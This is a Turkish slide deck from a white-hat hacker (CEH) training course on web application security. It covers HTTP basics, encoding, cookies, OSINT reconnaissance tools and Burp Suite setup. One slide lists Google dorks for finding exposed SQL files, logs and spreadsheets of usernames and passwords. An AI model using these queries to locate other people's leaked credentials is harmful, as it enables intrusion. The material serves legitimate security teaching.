Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Beyaz Şapkalı Hacker CEH Eğitimi - Web Uygulama Güvenliği

3,680 views

Published on

Bu sunum, Prisma tarafından verilen “Uygulamalı Beyaz Şapkalı Hacker Eğitimi v1” de anlatılan bir üniteye aittir.

PRISMA CSI • Cyber Security and Intelligence www.prismacsi.com

Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.

Published in: Education
  • Login to see the comments

Beyaz Şapkalı Hacker CEH Eğitimi - Web Uygulama Güvenliği

  1. 1. www.prismacsi.com © All Rights Reserved. 1 www.prismacsi.com © All Rights Reserved. 1 www.prismacsi.com © All Rights Reserved. 1 www.prismacsi.com © All Rights Reserved. 1 Uygulamalı Beyaz Şapkalı Hacker Eğitimi #9 Web Uygulama Güvenliği Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
  2. 2. www.prismacsi.com © All Rights Reserved. 2 www.prismacsi.com © All Rights Reserved. 2 www.prismacsi.com © All Rights Reserved. 2 www.prismacsi.com © All Rights Reserved. 2 Başlıklar • Web Teknolojileri • Mimari • HTML • HTML Encoding • URL • URL Encoding • HTTP Temelleri • HTTP Protokolü • HTTP Durum Kodları • Cookie • Session • Bilgi Toplama
  3. 3. www.prismacsi.com © All Rights Reserved. 3 www.prismacsi.com © All Rights Reserved. 3 www.prismacsi.com © All Rights Reserved. 3 www.prismacsi.com © All Rights Reserved. 3 Başlıklar • Burp Suite • Zafiyetler • SQL Injection • Cross Site Scripting • Insecure Direct Object References (IDOR) • Cross Site Request Forgery (CSRF) • File Upload • File Inclusion • Command Injection • Uygulama Sunucu Zafiyetleri • DoS Zafiyetleri
  4. 4. www.prismacsi.com © All Rights Reserved. 4 www.prismacsi.com © All Rights Reserved. 4 www.prismacsi.com © All Rights Reserved. 4 www.prismacsi.com © All Rights Reserved. 4 Başlıklar • OWASP TOP 10 • Otomatize Zafiyet Keşfi • Netsparker • Acunetix • Burpsuite • Arachni • Nessus • Nikto • Kullanışlı Firefox Eklentileri
  5. 5. www.prismacsi.com © All Rights Reserved. 5 www.prismacsi.com © All Rights Reserved. 5 www.prismacsi.com © All Rights Reserved. 5 www.prismacsi.com © All Rights Reserved. 5 Web Teknolojileri
  6. 6. www.prismacsi.com © All Rights Reserved. 6 www.prismacsi.com © All Rights Reserved. 6 www.prismacsi.com © All Rights Reserved. 6 www.prismacsi.com © All Rights Reserved. 6 Web Teknolojileri – Mimari • Çoğu Web Uygulaması 3 temel bileşene dayanmaktadır: • İstemci: Büyük oranda web tarayıcı. • Sunucu: İstemciden gelen istekleri karşılayan bir sunucu. • Veritabanı: Verilerin alınıp kaydedildiği ve çağırıldığı veritabanı. İstemci Sunucu Veritabanı
  7. 7. www.prismacsi.com © All Rights Reserved. 7 www.prismacsi.com © All Rights Reserved. 7 www.prismacsi.com © All Rights Reserved. 7 www.prismacsi.com © All Rights Reserved. 7 Web Teknolojileri – Mimari • İstemci taraflı teknolojiler: • İstemci taraflı teknolojiler internet kullanıcıları tarafından günlük olarak kullanılan teknolojilerdir. Firefox, Chrome, Opera, Safari gibi tarayıcılar ile birlikte kullanılan HTML, Javascript, Flash bunlara örnek olarak verilebilir. İstemci
  8. 8. www.prismacsi.com © All Rights Reserved. 8 www.prismacsi.com © All Rights Reserved. 8 www.prismacsi.com © All Rights Reserved. 8 www.prismacsi.com © All Rights Reserved. 8 Web Teknolojileri – Mimari • Sunucu taraflı teknolojiler: • İstemcilere bilgi sunan ve istemciden gelen verilerin işlenmesini sağlayan teknolojilerdir. • Çok fazla ve farklı teknolojiler burada bulunur. Bundan dolayı bu kısımda zafiyet bulunma olasılığı yüksektir. • Başlıca sunucu taraflı teknolojiler: • Apache, Nginx, IIS gibi web sunucuları • Tomcat, JBoss, Oracle Application Server gibi uygulama sunucuları • C#, PHP, Java, Python, Ruby, ASP başlıca kullanılan dillerdir. Sunucu
  9. 9. www.prismacsi.com © All Rights Reserved. 9 www.prismacsi.com © All Rights Reserved. 9 www.prismacsi.com © All Rights Reserved. 9 www.prismacsi.com © All Rights Reserved. 9 Web Teknolojileri – Mimari • Veritabanı: • Veritabanları uygulama sunucularıyla aynı sunucu üzerinde bulunacağı gibi güvenlik sebebiyle başka sunucular üzerinde de bulunabilir. • Başlıca veritabanı teknolojileri: • İlişkisel: MySQL, Microsoft SQL Server, Oracle, PostgreSQL • NoSQL: MongoDB, CouchDB Veritabanı
  10. 10. www.prismacsi.com © All Rights Reserved. 10 www.prismacsi.com © All Rights Reserved. 10 www.prismacsi.com © All Rights Reserved. 10 www.prismacsi.com © All Rights Reserved. 10 Web Teknolojileri – Mimari Client Side Server Side DBMS
  11. 11. www.prismacsi.com © All Rights Reserved. 11 www.prismacsi.com © All Rights Reserved. 11 www.prismacsi.com © All Rights Reserved. 11 www.prismacsi.com © All Rights Reserved. 11 Web Teknolojileri – HTML • HTML (Hyper Text Markup Language) internet üzerinde web sayfası oluşturmak için kullanılan bir betik dilidir. • HTML dosyaları sunucu bilgisayarın sabit diskinde .html ya da .htm uzantısı ile saklanır. • Yazılan HTML dosyaları düz yazı formatındadır. • HTML kodları tarayıcılar aracılığıyla okunup, yorumlanır ve görsel olarak sunulur. • HTML dosyalarının aktarımı için HTTP (Hyper Text Transfer Protocol) kullanılır.
  12. 12. www.prismacsi.com © All Rights Reserved. 12 www.prismacsi.com © All Rights Reserved. 12 www.prismacsi.com © All Rights Reserved. 12 www.prismacsi.com © All Rights Reserved. 12 Web Teknolojileri – HTML <!DOCTYPE html> <html> <head> <title> Prisma CSI </title> </head> <body> <h1> Başlık </h1> <p> Paragraf </p> <img src="https://www.prismacsi.com/logo.png"> </body> </html>
  13. 13. www.prismacsi.com © All Rights Reserved. 13 www.prismacsi.com © All Rights Reserved. 13 www.prismacsi.com © All Rights Reserved. 13 www.prismacsi.com © All Rights Reserved. 13 Web Teknolojileri – HTML • Temel HTML Elementleri: • head • title • body • script • style • table • a • img • iframe • <! - - yorum satırı - - >
  14. 14. www.prismacsi.com © All Rights Reserved. 14 www.prismacsi.com © All Rights Reserved. 14 www.prismacsi.com © All Rights Reserved. 14 www.prismacsi.com © All Rights Reserved. 14 Web Teknolojileri – HTML <a> (anchor) • Linkleme işlemi için kullanılır. <a href="www.prismacsi.com"> PRISMA CSI </a>
  15. 15. www.prismacsi.com © All Rights Reserved. 15 www.prismacsi.com © All Rights Reserved. 15 www.prismacsi.com © All Rights Reserved. 15 www.prismacsi.com © All Rights Reserved. 15 Web Teknolojileri – HTML <img> • Sayfaya resim eklemek için kullanılır. • Soru: Nasıl kötüye kullanılır? <img src="https://www.prismacsi.com/logo.png" height="200">
  16. 16. www.prismacsi.com © All Rights Reserved. 16 www.prismacsi.com © All Rights Reserved. 16 www.prismacsi.com © All Rights Reserved. 16 www.prismacsi.com © All Rights Reserved. 16 Web Teknolojileri – HTML <iframe> • HTML sayfa içerisinde başka bir siteyi çağırmak için kullanılır.
  17. 17. www.prismacsi.com © All Rights Reserved. 17 www.prismacsi.com © All Rights Reserved. 17 www.prismacsi.com © All Rights Reserved. 17 www.prismacsi.com © All Rights Reserved. 17 Web Teknolojileri – HTML <!- - - -> • Tarayıcılar tarafından işletilmeyen, yazılımcıların genellikle kendilerine hatırlatma amacıyla koyduğu yorum satırlarıdır.
  18. 18. www.prismacsi.com © All Rights Reserved. 18 www.prismacsi.com © All Rights Reserved. 18 www.prismacsi.com © All Rights Reserved. 18 www.prismacsi.com © All Rights Reserved. 18 Web Teknolojileri – HTML Encoding • HTML Encoding ' &apos; apostrophe " &quot; quotation < &lt; less-than > &gt; greater-than & &amp; Ampersand
  19. 19. www.prismacsi.com © All Rights Reserved. 19 www.prismacsi.com © All Rights Reserved. 19 www.prismacsi.com © All Rights Reserved. 19 www.prismacsi.com © All Rights Reserved. 19 Web Teknolojileri – HTML Encoding • HTML Encoding
  20. 20. www.prismacsi.com © All Rights Reserved. 20 www.prismacsi.com © All Rights Reserved. 20 www.prismacsi.com © All Rights Reserved. 20 www.prismacsi.com © All Rights Reserved. 20 Web Teknolojileri – URL • URL (Uniform Resource Locator) • Web uygulamalarına erişim için adresleme standardı • Rezerve Karakterler: ! * ’ ( ) ; , : @ & = + $ / ? % # [ ] • protokol://host:port/doküman_yolu?parametre=değer#fragment protokol http, https, ftp host:port prismacsi.com:80 doküman_yolu /, /index.html, /egitimler/index.html ?parametre=değer ?egitim=hackercamp #fragment #linux
  21. 21. www.prismacsi.com © All Rights Reserved. 21 www.prismacsi.com © All Rights Reserved. 21 www.prismacsi.com © All Rights Reserved. 21 www.prismacsi.com © All Rights Reserved. 21 Web Teknolojileri – URL Encoding • https://www.w3schools.com/tags/ref_urlencode.asp ' %27 " %22 < %3C > &3E / %2F ( %28 ) %29 : &3A ; &3B A %41
  22. 22. www.prismacsi.com © All Rights Reserved. 22 www.prismacsi.com © All Rights Reserved. 22 www.prismacsi.com © All Rights Reserved. 22 www.prismacsi.com © All Rights Reserved. 22 Web Teknolojileri – URL Encoding • https%3A%2F%2Fwww.prismacsi.com%2F%3Fsearch%3Dtest%27mesaj%22%3B%23 • https://www.prismacsi.com/?search=test'mesaj";# : / / / ? = " ;' #
  23. 23. www.prismacsi.com © All Rights Reserved. 23 www.prismacsi.com © All Rights Reserved. 23 www.prismacsi.com © All Rights Reserved. 23 www.prismacsi.com © All Rights Reserved. 23 HTTP Temelleri
  24. 24. www.prismacsi.com © All Rights Reserved. 24 www.prismacsi.com © All Rights Reserved. 24 www.prismacsi.com © All Rights Reserved. 24 www.prismacsi.com © All Rights Reserved. 24 HTTP Temelleri • HTTP protokolü genel olarak web tarayıcılarının kullandığı bir protokoldür. • Kullanıcı ve Web Uygulaması arasındaki trafik genellikle HTTP protokolü üzerinden gerçekleşir. • Default olarak TCP 80 portunda çalışır. • Plaintext’dir. • İstek ve cevap şeklinde çalışır. • Bu kullanıcı şuan sistemde mi? Yetkili mi? Gibi durum kontrolü yapmaz. • Durum kontrolü yapmadığı için Cookie ve Session mekanizmaları kullanılır. • Cevaplarda durum kodları bulunur.
  25. 25. www.prismacsi.com © All Rights Reserved. 25 www.prismacsi.com © All Rights Reserved. 25 www.prismacsi.com © All Rights Reserved. 25 www.prismacsi.com © All Rights Reserved. 25 HTTP Temelleri • Header ve Body olarak iki ana bölümden oluşur: HEADERSrn rn MESSAGE BODYrn POST /sayfa.php HTTP/1.1 User-Agent: Mozilla/4.0 Host: facebook.com Content-Length=15 isim=Hakan HEADER MESSAGE BODY
  26. 26. www.prismacsi.com © All Rights Reserved. 26 www.prismacsi.com © All Rights Reserved. 26 www.prismacsi.com © All Rights Reserved. 26 www.prismacsi.com © All Rights Reserved. 26 HTTP Temelleri • Örnek: Google.com’a gitmek için nasıl bir istekte bulunuyoruz? GET / HTTP/1.1 Host: google.com.tr User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: NID=111=… Connection: close
  27. 27. www.prismacsi.com © All Rights Reserved. 27 www.prismacsi.com © All Rights Reserved. 27 www.prismacsi.com © All Rights Reserved. 27 www.prismacsi.com © All Rights Reserved. 27 HTTP Temelleri • Request metodumuzdur. • Sunucudan ne tarz bir istekte bulunduğumuzu belirtiriz. GET /sayfa.php?isim=Hakan HTTP/1.1 User-Agent: Mozilla/4.0 Host: facebook.com • GET dışında POST, PUT, DELETE, OPTIONS gibi farklı metodlarda mevcuttur.
  28. 28. www.prismacsi.com © All Rights Reserved. 28 www.prismacsi.com © All Rights Reserved. 28 www.prismacsi.com © All Rights Reserved. 28 www.prismacsi.com © All Rights Reserved. 28 HTTP Temelleri • PATH belirtir. • Hangi dizine istek yapılıyorsa o yazılır. • Örneğin Google.com/translate/index.php için yapılacak olan GET isteği: GET /translate/index.php HTTP/1.1 Şeklinde olacaktır. • Ana dizin her zaman / ile belirtilir.
  29. 29. www.prismacsi.com © All Rights Reserved. 29 www.prismacsi.com © All Rights Reserved. 29 www.prismacsi.com © All Rights Reserved. 29 www.prismacsi.com © All Rights Reserved. 29 HTTP Temelleri • Protokol bilgisini belirtir. • Güncel olarak HTTP 1.1 protokolü kullanılmaktadır.
  30. 30. www.prismacsi.com © All Rights Reserved. 30 www.prismacsi.com © All Rights Reserved. 30 www.prismacsi.com © All Rights Reserved. 30 www.prismacsi.com © All Rights Reserved. 30 POST • GET ile aynı işlemi yapar fakat POST ile daha fazla veri gönderilebilir, veriler arka planda HTTP isteğinin body kısmında gönderilir, URL'de bu değerler gözükmez • Örneğin File Upload işlemleri POST metodunu kullanırlar POST /sayfa.php HTTP/1.1 User-Agent: Mozilla/4.0 Host: facebook.com Content-Length=15 ... isim=Hakan
  31. 31. www.prismacsi.com © All Rights Reserved. 31 www.prismacsi.com © All Rights Reserved. 31 www.prismacsi.com © All Rights Reserved. 31 www.prismacsi.com © All Rights Reserved. 31 HTTP Temelleri Host: google.com.tr • Bir IP adresi üzeride birden fazla web sitesi barınıyor olabilir. • Host başlık bilgisi sunucu üzerinde hangi siteye istek yapıldığını belirtir. • HTTP Başlıkları • Başlık_İsmi:Başlık Değeri şeklinde yazılır.
  32. 32. www.prismacsi.com © All Rights Reserved. 32 www.prismacsi.com © All Rights Reserved. 32 www.prismacsi.com © All Rights Reserved. 32 www.prismacsi.com © All Rights Reserved. 32 HTTP Temelleri • Durum Kodları • 1xx : Bilgi • 2xx : Başarılı • 200 OK • 3xx : Yönlendirme • 4xx : Sunucu taraflı bir hata • 401 Unauthorized • 403 Forbidden • 404 Not found • 5xx : Server taraflı bir hata
  33. 33. www.prismacsi.com © All Rights Reserved. 33 www.prismacsi.com © All Rights Reserved. 33 www.prismacsi.com © All Rights Reserved. 33 www.prismacsi.com © All Rights Reserved. 33 HTTP Temelleri • Cookie • Oturum bilgileri browser tarafından saklanır ve oturumu tanımlayan değerlerdir. • Kullanıcının bilgilerini barındırır. • Cookie HTTP başlığı ile alınır ve yollanır. • Cookie sunucu tarafından tanımlanır.
  34. 34. www.prismacsi.com © All Rights Reserved. 34 www.prismacsi.com © All Rights Reserved. 34 www.prismacsi.com © All Rights Reserved. 34 www.prismacsi.com © All Rights Reserved. 34 HTTP Temelleri • Cookie • Cookieler Set-Cookie başlığı ile atanır. • Set-Cookie: CookieName=CookieValue; expires=tarih; domain=alan adı; path=path; secure; • Domain: Cookie ayarlandıktan sonra hangi domain’e istek yapıldığında bu cookie’nin ekleneceğini belirten değerdir. • Path: Cookie’nin hangi path’e istek yapıldığında ekleneceğini belirten değerdir. • Expires: Cookie’nin ne zaman geçersiz olacağını belirten değerdir. Belirtilmediği takdirde browser kapandıktan sonra Cookie silinir. • Secure: Cookie’nin yalnızca HTTPS bağlantılarda gönderilmesini gerektiğini belirten değerdir. • HttpOnly: Cookie’nin yalnızca HTTP istekleri sırasında kullanılacağını belirtir. Javascript gibi çağrılara eklenmez.
  35. 35. www.prismacsi.com © All Rights Reserved. 35 www.prismacsi.com © All Rights Reserved. 35 www.prismacsi.com © All Rights Reserved. 35 www.prismacsi.com © All Rights Reserved. 35 HTTP Temelleri • Session • Oturum bilgileri sunucu tarafında farklı noktalarda saklanabilir: • Veritabanında • Dosya üzerinde • İstemci tarafında Session ID saklanır • Session ID'ye sahip herkes bu hesaplara erişim sağlayabilir
  36. 36. www.prismacsi.com © All Rights Reserved. 36 www.prismacsi.com © All Rights Reserved. 36 www.prismacsi.com © All Rights Reserved. 36 www.prismacsi.com © All Rights Reserved. 36 Bilgi Toplama
  37. 37. www.prismacsi.com © All Rights Reserved. 37 www.prismacsi.com © All Rights Reserved. 37 www.prismacsi.com © All Rights Reserved. 37 www.prismacsi.com © All Rights Reserved. 37 IP Aralığı Tespiti - Uygulama ripe.net
  38. 38. www.prismacsi.com © All Rights Reserved. 38 www.prismacsi.com © All Rights Reserved. 38 www.prismacsi.com © All Rights Reserved. 38 www.prismacsi.com © All Rights Reserved. 38 Whois Analizi - Uygulama who.is
  39. 39. www.prismacsi.com © All Rights Reserved. 39 www.prismacsi.com © All Rights Reserved. 39 www.prismacsi.com © All Rights Reserved. 39 www.prismacsi.com © All Rights Reserved. 39 Reverse Whois Analizi - Uygulama whoisology.com
  40. 40. www.prismacsi.com © All Rights Reserved. 40 www.prismacsi.com © All Rights Reserved. 40 www.prismacsi.com © All Rights Reserved. 40 www.prismacsi.com © All Rights Reserved. 40 Subdomain, Virtualhost ve Email Keşfi - Uygulama theharvester
  41. 41. www.prismacsi.com © All Rights Reserved. 41 www.prismacsi.com © All Rights Reserved. 41 www.prismacsi.com © All Rights Reserved. 41 www.prismacsi.com © All Rights Reserved. 41 Aquatone-Discover - Uygulama aquatone-discover –d yandex.com
  42. 42. www.prismacsi.com © All Rights Reserved. 42 www.prismacsi.com © All Rights Reserved. 42 www.prismacsi.com © All Rights Reserved. 42 www.prismacsi.com © All Rights Reserved. 42 Sublist3r - Uygulama https://github.com/aboul3la/Sublist3r
  43. 43. www.prismacsi.com © All Rights Reserved. 43 www.prismacsi.com © All Rights Reserved. 43 www.prismacsi.com © All Rights Reserved. 43 www.prismacsi.com © All Rights Reserved. 43 DNS Bilgileri - Uygulama robtex.com
  44. 44. www.prismacsi.com © All Rights Reserved. 44 www.prismacsi.com © All Rights Reserved. 44 www.prismacsi.com © All Rights Reserved. 44 www.prismacsi.com © All Rights Reserved. 44 DNS Bilgileri - Uygulama dnsdumpster.com
  45. 45. www.prismacsi.com © All Rights Reserved. 45 www.prismacsi.com © All Rights Reserved. 45 www.prismacsi.com © All Rights Reserved. 45 www.prismacsi.com © All Rights Reserved. 45 DNS Bilgileri - Uygulama mxtoolbox.com
  46. 46. www.prismacsi.com © All Rights Reserved. 46 www.prismacsi.com © All Rights Reserved. 46 www.prismacsi.com © All Rights Reserved. 46 www.prismacsi.com © All Rights Reserved. 46 DNS Bilgileri - Uygulama dnsstuff.com
  47. 47. www.prismacsi.com © All Rights Reserved. 47 www.prismacsi.com © All Rights Reserved. 47 www.prismacsi.com © All Rights Reserved. 47 www.prismacsi.com © All Rights Reserved. 47 DNS Bilgileri - Uygulama dig
  48. 48. www.prismacsi.com © All Rights Reserved. 48 www.prismacsi.com © All Rights Reserved. 48 www.prismacsi.com © All Rights Reserved. 48 www.prismacsi.com © All Rights Reserved. 48 DNS Bilgileri - Uygulama dig
  49. 49. www.prismacsi.com © All Rights Reserved. 49 www.prismacsi.com © All Rights Reserved. 49 www.prismacsi.com © All Rights Reserved. 49 www.prismacsi.com © All Rights Reserved. 49 Fierce DNS Keşif - Uygulama
  50. 50. www.prismacsi.com © All Rights Reserved. 50 www.prismacsi.com © All Rights Reserved. 50 www.prismacsi.com © All Rights Reserved. 50 www.prismacsi.com © All Rights Reserved. 50 Yougetsignal - Uygulama yougetsignal.com
  51. 51. www.prismacsi.com © All Rights Reserved. 51 www.prismacsi.com © All Rights Reserved. 51 www.prismacsi.com © All Rights Reserved. 51 www.prismacsi.com © All Rights Reserved. 51 Bing - Uygulama bing.com
  52. 52. www.prismacsi.com © All Rights Reserved. 52 www.prismacsi.com © All Rights Reserved. 52 www.prismacsi.com © All Rights Reserved. 52 www.prismacsi.com © All Rights Reserved. 52 Netcraft - Uygulama netcraft.com
  53. 53. www.prismacsi.com © All Rights Reserved. 53 www.prismacsi.com © All Rights Reserved. 53 www.prismacsi.com © All Rights Reserved. 53 www.prismacsi.com © All Rights Reserved. 53 Wayback Machine - Uygulama Archive.org
  54. 54. www.prismacsi.com © All Rights Reserved. 54 www.prismacsi.com © All Rights Reserved. 54 www.prismacsi.com © All Rights Reserved. 54 www.prismacsi.com © All Rights Reserved. 54 Wayback Machine - Uygulama archive.org
  55. 55. www.prismacsi.com © All Rights Reserved. 55 www.prismacsi.com © All Rights Reserved. 55 www.prismacsi.com © All Rights Reserved. 55 www.prismacsi.com © All Rights Reserved. 55 Shodan - Uygulama shodan.io
  56. 56. www.prismacsi.com © All Rights Reserved. 56 www.prismacsi.com © All Rights Reserved. 56 www.prismacsi.com © All Rights Reserved. 56 www.prismacsi.com © All Rights Reserved. 56 Censys - Uygulama censys.io
  57. 57. www.prismacsi.com © All Rights Reserved. 57 www.prismacsi.com © All Rights Reserved. 57 www.prismacsi.com © All Rights Reserved. 57 www.prismacsi.com © All Rights Reserved. 57 Haveibeenpwned - Uygulama haveibeenpwned.com
  58. 58. www.prismacsi.com © All Rights Reserved. 58 www.prismacsi.com © All Rights Reserved. 58 www.prismacsi.com © All Rights Reserved. 58 www.prismacsi.com © All Rights Reserved. 58 Serversniff - Uygulama • Online Araştırma Kaynakları – Serversniff.net
  59. 59. www.prismacsi.com © All Rights Reserved. 59 www.prismacsi.com © All Rights Reserved. 59 www.prismacsi.com © All Rights Reserved. 59 www.prismacsi.com © All Rights Reserved. 59 Hackertarget - Uygulama • Online Araştırma Kaynakları – Hackertarget.com
  60. 60. www.prismacsi.com © All Rights Reserved. 60 www.prismacsi.com © All Rights Reserved. 60 www.prismacsi.com © All Rights Reserved. 60 www.prismacsi.com © All Rights Reserved. 60 Alexa - Uygulama alexa.com
  61. 61. www.prismacsi.com © All Rights Reserved. 61 www.prismacsi.com © All Rights Reserved. 61 www.prismacsi.com © All Rights Reserved. 61 www.prismacsi.com © All Rights Reserved. 61 Pastebin- Uygulama pastebin.com
  62. 62. www.prismacsi.com © All Rights Reserved. 62 www.prismacsi.com © All Rights Reserved. 62 www.prismacsi.com © All Rights Reserved. 62 www.prismacsi.com © All Rights Reserved. 62 Pastebin Search - Uygulama https://inteltechniques.com/OSINT/pastebins.html
  63. 63. www.prismacsi.com © All Rights Reserved. 63 www.prismacsi.com © All Rights Reserved. 63 www.prismacsi.com © All Rights Reserved. 63 www.prismacsi.com © All Rights Reserved. 63 Stackoverflow - Uygulama stackoverflow.com
  64. 64. www.prismacsi.com © All Rights Reserved. 64 www.prismacsi.com © All Rights Reserved. 64 www.prismacsi.com © All Rights Reserved. 64 www.prismacsi.com © All Rights Reserved. 64 Github - Uygulama github.com
  65. 65. www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com © All Rights Reserved. 65 Google Hacking DB • Google Hacking DB • Dork kavramı • Sık kullanılan parametreler • Site , -site, Inurl, intitle, intext • Filetype: , ext : , cache:
  66. 66. www.prismacsi.com © All Rights Reserved. 66 www.prismacsi.com © All Rights Reserved. 66 www.prismacsi.com © All Rights Reserved. 66 www.prismacsi.com © All Rights Reserved. 66 Google Hacking DB • Örnek Dorklar • Intitle:index.of url:domain.com • Intitle:index.of inurl:domain.com filetype:sql • Site:domain.com –site:www.domain.com unique • Filetype:log intext:”putty” • Filetype:xls “username | password” • Ext:phps “mysql_connect” • inurl:/view/index/shtml
  67. 67. www.prismacsi.com © All Rights Reserved. 67 www.prismacsi.com © All Rights Reserved. 67 www.prismacsi.com © All Rights Reserved. 67 www.prismacsi.com © All Rights Reserved. 67 Google Hacking DB - Uygulama • https://www.exploit-db.com/google-hacking-database/
  68. 68. www.prismacsi.com © All Rights Reserved. 68 www.prismacsi.com © All Rights Reserved. 68 www.prismacsi.com © All Rights Reserved. 68 www.prismacsi.com © All Rights Reserved. 68 Google Hacking DB - Uygulama • Google Images
  69. 69. www.prismacsi.com © All Rights Reserved. 69 www.prismacsi.com © All Rights Reserved. 69 www.prismacsi.com © All Rights Reserved. 69 www.prismacsi.com © All Rights Reserved. 69 Ek Araçların Listesi Bu araçlar ile manuel olarak ele alınan süreçlerin büyük bölümü için otomatize analiz yapılabilir. • Spiderfoot • Recon-ng • Foca • Metagoofil • Maltego
  70. 70. www.prismacsi.com © All Rights Reserved. 70 www.prismacsi.com © All Rights Reserved. 70 www.prismacsi.com © All Rights Reserved. 70 www.prismacsi.com © All Rights Reserved. 70 Burp Suite
  71. 71. www.prismacsi.com © All Rights Reserved. 71 www.prismacsi.com © All Rights Reserved. 71 www.prismacsi.com © All Rights Reserved. 71 www.prismacsi.com © All Rights Reserved. 71 Burp Suite Nedir? • Burp Suite Web Uygulama Güvenliği testlerinde yaygın olarak kullanılan HTTP Proxy araçlarından biridir. • Ticari bir üründür. • Kısıtlı imkanların bulunduğu ücretsiz sürümü de bulunmaktadır. • https://portswigger.net/burp/communitydownload adresinden indirilebilir.
  72. 72. www.prismacsi.com © All Rights Reserved. 72 www.prismacsi.com © All Rights Reserved. 72 www.prismacsi.com © All Rights Reserved. 72 www.prismacsi.com © All Rights Reserved. 72 Burp Suite Konfigürasyonu • Burp Suite standart olarak gelen ayarlarda 127.0.0.1:8080 adresini dinlemektedir.
  73. 73. www.prismacsi.com © All Rights Reserved. 73 www.prismacsi.com © All Rights Reserved. 73 www.prismacsi.com © All Rights Reserved. 73 www.prismacsi.com © All Rights Reserved. 73 Burp Suite Konfigürasyonu • Tarayıcımızın Ayarlar - Gelişmiş - Bağlantı Ayarlarından 127.0.0.1:8080 yönlendirilir.
  74. 74. www.prismacsi.com © All Rights Reserved. 74 www.prismacsi.com © All Rights Reserved. 74 www.prismacsi.com © All Rights Reserved. 74 www.prismacsi.com © All Rights Reserved. 74 Burp Suite Konfigürasyonu • Tarayıcıdan gelen trafiğin Burp üzerinde görüntülenmesi aşağıdaki gibidir
  75. 75. www.prismacsi.com © All Rights Reserved. 75 www.prismacsi.com © All Rights Reserved. 75 www.prismacsi.com © All Rights Reserved. 75 www.prismacsi.com © All Rights Reserved. 75 Burp Suite Sertifika Konfigürasyonu • SSL Trafiğinin dinlenmesi için CA sertifikasının yüklenmesi gerekmektedir.
  76. 76. www.prismacsi.com © All Rights Reserved. 76 www.prismacsi.com © All Rights Reserved. 76 www.prismacsi.com © All Rights Reserved. 76 www.prismacsi.com © All Rights Reserved. 76 Burp Suite Sertifika Konfigürasyonu • Burp Suite açtıktan sonra tarayıdan http://burp adresine giderek CA CERTIFICATE butonuna tıklayıp sertifika indirilir.
  77. 77. www.prismacsi.com © All Rights Reserved. 77 www.prismacsi.com © All Rights Reserved. 77 www.prismacsi.com © All Rights Reserved. 77 www.prismacsi.com © All Rights Reserved. 77 Burp Suite Sertifika Konfigürasyonu • Tercihler-Gelişmiş-Sertifikalar-Sertifikaları Göster-İçe Aktar` a tıklayıp indirdiğimiz sertifikayı tarayıcımıza ekleyebiliriz.
  78. 78. www.prismacsi.com © All Rights Reserved. 78 www.prismacsi.com © All Rights Reserved. 78 www.prismacsi.com © All Rights Reserved. 78 www.prismacsi.com © All Rights Reserved. 78 Burp Suite Kullanımı • Proxy sekmesi altında Intercept sekmesinde Forward butonu yardımı ile istek adrese iletilir.
  79. 79. www.prismacsi.com © All Rights Reserved. 79 www.prismacsi.com © All Rights Reserved. 79 www.prismacsi.com © All Rights Reserved. 79 www.prismacsi.com © All Rights Reserved. 79 Burp Suite Kullanımı • Proxy sekmesi altında Intercept sekmesinde Drop butonu ile istek sonlandırılabilir.
  80. 80. www.prismacsi.com © All Rights Reserved. 80 www.prismacsi.com © All Rights Reserved. 80 www.prismacsi.com © All Rights Reserved. 80 www.prismacsi.com © All Rights Reserved. 80 Burp Suite Kullanımı • Proxy sekmesi altında HTTP History sekmesinde yaptığımız istekleri görüntüleyebiliriz.
  81. 81. www.prismacsi.com © All Rights Reserved. 81 www.prismacsi.com © All Rights Reserved. 81 www.prismacsi.com © All Rights Reserved. 81 www.prismacsi.com © All Rights Reserved. 81 Burp Suite Site Map Kullanımı • Target sekmesinde Site Map butonu yardımı ile hedef sitenin site haritasını görüntüleyebilirsiniz.
  82. 82. www.prismacsi.com © All Rights Reserved. 82 www.prismacsi.com © All Rights Reserved. 82 www.prismacsi.com © All Rights Reserved. 82 www.prismacsi.com © All Rights Reserved. 82 Burp Suite Scope Kullanımı • Target -> Site Map sekmesinde URL lerden birine sağ tıkla Add to Scope seçeneğiyle listelemek istenilen adresler Scope Sekmesine eklenir.
  83. 83. www.prismacsi.com © All Rights Reserved. 83 www.prismacsi.com © All Rights Reserved. 83 www.prismacsi.com © All Rights Reserved. 83 www.prismacsi.com © All Rights Reserved. 83 Burp Suite Scope Kullanımı • Target sekmesinde Scope sekmesinde eklediğimiz URL’leri listeleyebiliriz
  84. 84. www.prismacsi.com © All Rights Reserved. 84 www.prismacsi.com © All Rights Reserved. 84 www.prismacsi.com © All Rights Reserved. 84 www.prismacsi.com © All Rights Reserved. 84 Burp Suite Spider Kullanımı • Spider fonksiyonu Scope’a eklediğiniz siteleri dolaşarak sitedeki urlleri listelemektedir.
  85. 85. www.prismacsi.com © All Rights Reserved. 85 www.prismacsi.com © All Rights Reserved. 85 www.prismacsi.com © All Rights Reserved. 85 www.prismacsi.com © All Rights Reserved. 85 Burp Suite Spider Kullanımı • Spider -> Options sekmesine geçip özelleştirebilecek ayarlar görüntülenir.
  86. 86. www.prismacsi.com © All Rights Reserved. 86 www.prismacsi.com © All Rights Reserved. 86 www.prismacsi.com © All Rights Reserved. 86 www.prismacsi.com © All Rights Reserved. 86 Burp Suite Spider - Crawler Ayarları • Check robots.txt: robots.txt dosyasını kontrol etme durumu belirlenir.
